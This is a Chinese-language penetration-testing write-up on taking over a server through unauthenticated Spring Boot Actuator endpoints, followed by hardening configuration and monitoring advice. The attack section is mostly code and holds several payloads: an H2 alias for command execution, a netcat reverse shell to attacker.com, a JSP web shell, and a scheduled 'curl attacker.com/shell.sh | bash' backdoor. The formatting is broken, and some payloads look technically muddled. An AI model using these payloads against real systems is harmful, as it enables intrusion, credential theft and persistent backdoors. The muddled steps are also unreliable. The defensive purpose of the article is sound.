# Spring Boot Actuator從未授權訪問到getshell的示例分析
## 0x00 前言
Spring Boot Actuator是Spring Boot提供的生產級功能模塊,用于監控和管理應用程序。然而當配置不當時,其暴露的敏感端點可能成為攻擊者突破系統防線的入口。本文將通過一個完整的滲透測試案例,詳細分析如何從Actuator未授權訪問漏洞逐步獲取服務器權限。
## 0x01 漏洞背景
### 1.1 Actuator端點簡介
Spring Boot Actuator默認提供以下關鍵端點(部分):
```plaintext
/actuator/health - 應用健康狀態
/actuator/env - 環境變量信息
/actuator/beans - 所有Spring Beans
/actuator/mappings - URL路由映射
/actuator/heapdump - 堆內存轉儲
導致漏洞的典型配置:
# application.yml錯誤配置示例
management:
endpoints:
web:
exposure:
include: "*" # 暴露所有端點
endpoint:
health:
show-details: always
使用自動化工具掃描發現可疑端點:
$ curl http://target.com/actuator
{
"_links":{
"env":{"href":"/actuator/env"},
"heapdump":{"href":"/actuator/heapdump"},
"mappings":{"href":"/actuator/mappings"}
}
}
訪問env端點獲取關鍵配置:
$ curl http://target.com/actuator/env
{
"activeProfiles":["prod"],
"propertySources":[
{
"name":"systemEnvironment",
"properties":{
"DATABASE_PASSWORD":{"value":"P@ssw0rd123!"},
"API_KEY":{"value":"sk_live_abcdef123456"}
}
}
]
}
wget http://target.com/actuator/heapdump -O memory.hprof
// 發現數據庫連接池中的明文密碼
org.apache.tomcat.dbcp.dbcp2.BasicDataSource
-> connectionProperties = {user=admin, password=Admin@123}
通過env端點修改運行時配置:
POST /actuator/env HTTP/1.1
Content-Type: application/json
{
"name":"spring.datasource.tomcat.validation-query",
"value":"CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return \"success\";}';"
}
POST /actuator/refresh HTTP/1.1
GET /actuator/datasource?query=EXEC('nc+-e+/bin/bash+attacker.com+4444') HTTP/1.1
利用H2數據庫的SQL注入特性:
CREATE TABLE shell(
id int primary key,
content varchar(255)
AS VALUES(1, '<%@page import="java.util.*,java.io.*"%><% if(request.getParameter("cmd")!=null){Process p=Runtime.getRuntime().exec(request.getParameter("cmd"));BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));String line;while((line=br.readLine())!=null){out.println(line);}}%>')
通過cron表達式注入:
POST /actuator/env HTTP/1.1
Content-Type: application/json
{
"name":"spring.datasource.hikari.connection-init-sql",
"value":"CREATE EVENT IF NOT EXISTS backdoor ON SCHEDULE EVERY 1 MINUTE DO CALL EXEC('curl http://attacker.com/shell.sh | bash')"
}
management:
endpoints:
web:
exposure:
include: health,info # 僅開放必要端點
base-path: /internal # 修改默認路徑
endpoint:
shutdown:
enabled: false
@Configuration
public class ActuatorSecurity extends WebSecurityConfigurerAdapter {
@Override
protected void configure(HttpSecurity http) throws Exception {
http.requestMatcher(EndpointRequest.toAnyEndpoint())
.authorizeRequests().anyRequest().hasRole("ADMIN")
.and().httpBasic();
}
}
location ~ ^/actuator {
allow 192.168.1.0/24;
deny all;
auth_basic "Restricted";
auth_basic_user_file /etc/nginx/.htpasswd;
}
需監控的惡意請求模式:
- 高頻訪問/actuator/env端點
- POST請求修改運行時配置
- 非常規User-Agent掃描行為
2023-07-15 14:32:17 WARN o.s.b.a.e.web.EndpointLinksResolver - Potential malicious access attempt from 45.33.12.8 to /actuator/heapdump
2023-07-15 14:33:45 ERROR o.a.c.c.C.[.[.[/].[dispatcherServlet] - Servlet.service() for servlet [dispatcherServlet] threw exception: org.springframework.security.authentication.BadCredentialsException
// 安全啟動檢查示例
@SpringBootApplication
public class Application {
public static void main(String[] args) {
SpringApplication app = new SpringApplication(Application.class);
app.setAddCommandLineProperties(false); // 禁止命令行參數覆蓋
app.run(args);
}
}
”`
